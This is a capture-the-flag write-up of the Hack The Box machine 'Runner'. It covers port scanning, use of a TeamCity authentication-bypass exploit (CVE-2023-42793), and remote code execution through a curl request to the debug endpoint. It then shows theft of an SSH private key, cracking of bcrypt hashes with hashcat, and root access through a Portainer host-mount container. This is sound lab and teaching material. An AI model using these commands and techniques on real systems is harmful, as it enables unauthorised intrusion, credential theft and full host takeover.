> For the complete documentation index, see [llms.txt](https://blind0bandit.gitbook.io/blog/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blind0bandit.gitbook.io/blog/linux-machines/medium/htb-runner.md).

# HTB - Runner

<figure><img src="/files/jio5dPGH6aHDGlr8carY" alt=""><figcaption></figcaption></figure>

## Enumeration

***

**Scope**

> &#x20;Ip Address 10.10.11.13

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

```
* Open ports: 22 -80 - 8000
* UDP Open ports: None
* Services: ssh - http - http-alt
```

**CVE-2023-42793:**

{% embed url="<https://github.com/Zyad-Elsayed/CVE-2023-42793>" %}

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb 
   
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]
```

## Initial Access

***

<figure><img src="/files/r13e5CT7oUtZSC8Li8Db" alt=""><figcaption></figcaption></figure>

To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.&#x20;

#### Token

```
eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0
```

#### Get RCE

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"

StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
```

I tried to search for files containing passwords, sensitive info or private keys and found one.

```bash

tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----
```

`/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa`

```bash
-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
xxxxxxxxxxxxxxxxxxxxxxxxBG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlk2rRhm7T2dg2z3+Y6ioSOVszvNlA4wRS4ty8qrGMSCpnZyEISPl
htHGpTu0oGI11FTun7HzQj7Ore7YMC+SsMIlS78MGU2ogb0Tp2bOY5RN1/X9MiK/SE4liT
njhPU1FqBIexmXKlgS/jv57WUtc5CsgTUGYkpaX6cT2geiNqHLnB5QD+ZKJWBflF6P9rTt
zkEdcWYKtDp0Phcu1FUVeQJOpb13w/L0GGiya2RkZgrIwXR6l3YCX+mBRFfhRFHLmd/lgy
/R2GQpBWUDB9rUS+mtHpm4c3786g11IPZo+74I7BhOn1Iz2E5KO0tW2jefylY2MrYgOjjq
5fj0Fz3eoj4hxtZyuf0GR8Cq1AkowJyDP02XzIvVZKCMDgVNAMH5B7COTX8CjUzc0vuKV5
iLSi+vRx6vYQpQv4wlh1H4hUlgaVSimoAqizJPUqyAi9oUhHXGY71x5gCUXeULZJMcDYKB
..snip..
-----END OPENSSH PRIVATE KEY-----
```

I'll Try to login to ssh with the one of the existing users and the private key&#x20;

<figure><img src="/files/RlykSGg8ZHUs1DdIiIG6" alt=""><figcaption></figcaption></figure>

Success :)&#x20;

<figure><img src="/files/JUI5FysEalHU73QSzcUl" alt=""><figcaption></figcaption></figure>

```bash
john@runner:~$ cat user.txt 
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx
```

> User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

***

## Privilege Escalation

```bash
john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.11.13:80          10.10.16.31:55852       ESTABLISHED -
tcp        0      0 127.0.0.1:8111          127.0.0.1:39674         TIME_WAIT   -       
```

I'll try to map internal ports with ssh local port forwarding

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa
```

We got a web app

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT
```

`http://localhost:9000`

<figure><img src="/files/iamD9RNKAiIZ077DaVnR" alt=""><figcaption></figcaption></figure>

I knew I missed something so I returned to web app and found that I forgot to make a backup files and see what its content.

<figure><img src="/files/QCzsPtbXr9k5oAaUPlEE" alt=""><figcaption></figcaption></figure>

```bash
tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
```

```
matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

s
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked
```

Login in `http://localhost:9000` with these credentials&#x20;

<figure><img src="/files/cbJ7vZj6ftlz5g2kLYAh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/DxbAgCyaNmFBrheIUCMB" alt=""><figcaption></figcaption></figure>

This article is very useful to understand the setup of container but was based on older verions of portainer:

{% embed url="<https://rioasmara.com/2021/08/15/use-portainer-for-privilege-escalation/>" %}

#### Following the post:

#### Get the image id

<figure><img src="/files/6sCsEoEQzP2s05tmlmQW" alt=""><figcaption></figcaption></figure>

#### Try to map host file system to the container with the following settings

```
device: /
o: bind
type: none
```

<figure><img src="/files/ese4BMHFmopuVz7nGm0Z" alt=""><figcaption></figcaption></figure>

#### Create a container with the settings below

<figure><img src="/files/laDLRjV57IVaZLKBimSU" alt=""><figcaption></figcaption></figure>

#### Finally, Access the console and get root access :)

<figure><img src="/files/8wzo7auxGAiTDt7ncGTc" alt=""><figcaption></figcaption></figure>

> Root flag: e5072defc9d08b4320325b1e16a6b83f
